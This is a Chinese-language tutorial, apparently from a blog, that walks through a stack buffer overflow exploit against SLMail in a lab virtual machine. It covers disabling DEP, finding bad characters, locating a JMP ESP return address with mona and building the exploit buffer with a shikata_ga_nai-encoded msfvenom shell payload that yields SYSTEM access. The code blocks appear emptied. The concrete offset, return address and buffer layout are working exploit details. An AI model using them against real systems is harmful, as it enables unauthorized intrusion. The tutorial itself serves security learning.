上一篇:https://whale3070.github.io/buffer%20overflow/2019/12/13/08-x/
准备一个虚拟机
windows server 2008,安装好slmail、python环境、immunity debugger
然后将开始调试之前,生成一个快照。该虚拟机环境可下载,购买点我
关闭DEP保护
我们在命令提示符下运行不带有任何参数的bcdedit命令,可以看到当前的启动配置,如图所示显示了在Windows下运行bcdedit的结果,其中最后一行显示nx OptIn,表示当前的DEP保护级别为1,如果显示为OptOut则表示当前的EDP保护级别为2。如果我们要关闭EDP,只需将nx设置为Always0ff即可。
1 |
|
检查坏字符
将2700字节的buffer字符串修改为共3500字节,成功覆盖,说明430字节的空余空间足够shellcode使用。
buffer中,有些字符被认为是“坏”的,不允许使用。一个通用坏字符案例是0x00,这个字符在copy命令执行时,当遇到第一个0x00,会终止字符串。
0x0D同样是一个坏字符,它意味着密码已经输入完成了。
一个经验丰富的exp作者,知道检查所有坏字符,以避免未来可能出现的问题。
最简单的方法是发送所有可能的字符,从0x00到0xff作为buffer的一部分,然后查看这些字符串是如何被应用程序所处理的。
1 |
|
在kali上运行以上代码,目标机上依然报错了,我们选中右上角的寄存器面板,选中ESP( 栈指针寄存器)
右键-follow in dump,可以看到内存转储面板中,有一条内容为01 02 03 ... 09
的内容。
如果正常没有坏字符的话,后面应该是0a 0b 0c 0d
,而09后面的内容是29 20
,
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
值得注意的是0a是坏字符,而不是09。
坏字符0a
在每个程序中,坏字符并不是一样的。要根据不同的程序来判断。在这个程序中,修改发送的字符,去掉\x0a
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
在内存转储面板中,我们可以看到09之后,顺利往后执行为0b 0c ...
但是发现0d
又不见了,说明又发现了坏字符\x0d
最终检查出了坏字符有\x00\x0a\x0d
找到返回地址
JMP ESP 是汇编语言中跳转到栈指针寄存器的意思
!mona modules
找到没有DEP、ASLR等内存保护的程序
Openc32.dll
,图中4个false代表,该dll动态链接库不会在每次重启的时候改变地址,也没有内存保护,这暗示我们可以使用该dll中的JMP ESP
命令,跳转到栈指针寄存器。
使用msf将汇编语言JMP ESP
转换为二进制
1 |
|
结果为FFE4
下一步就是找出该DLL中的跳转ESP命令的地址。
!mona find -s "\xff\xe4" -m Openc32.dll
因为Openc32.dll没有找到pointer,所以换一个dll,和上述挑选条件一样,选择SLMFC.dll,这次找到了pointer。
!mona find -s "\xff\xe4" -m SLMFC.DLL
找到了一些包含JMP ESP的地址,我们选择一个不含坏字符的地址0x5f4c0ea3
修改exp
由于x86体系结构存储地址,使用little endian格式,就是小端存储。低位字节存储在存储器位于最低地址,高位字节位于最高地址。
将内存地址改写,0x5f4c0ea3
改写为\xa3\x0e\x4c\x5f
string= "A"* 2606+ "\xa3\x0e\x4c\x5f" + "C"*(3500-2606-4)
返回地址的无效数据改为跳转到ESP的指令。
生成payload
参考资料:msfvenom-生成攻击载荷-命令速查
1 |
|
这样直接生成出来的攻击载荷包含坏字符。所以要使用shikata_ga_nai模块进行编码,避免使用坏字符
1 |
|
运行exp
1 |
|
最终得到了一个system权限的shell
执行流程
在上一小节的exp中,栈中数据是这样运行的
string="A"*2606 + "\xa3\x0e\x4c\x5f" + "\x90" * 8 + shellcode
联系上一篇Sneaky(suid+缓冲区溢出提权),我们可以知道,最重要的是在跳转的时候,跳转的地址是shellcode之前
这样程序就会正常向后执行,来执行插入的shellcode,从而执行了我们想要的命令。
在本篇中,ESP的具体地址我们是不知道的,因为每一次程序运行,ESP的地址都有可能改变。取而代之的是使用JMP ESP
命令,让它帮助我们跳转到栈顶。如图所示,栈底就是一开始接受数据的地方,栈长度是2606,栈顶就是图中红色部分。
使用JMP ESP跳转到红色的部分,然后正常往后执行,就执行了shellcode。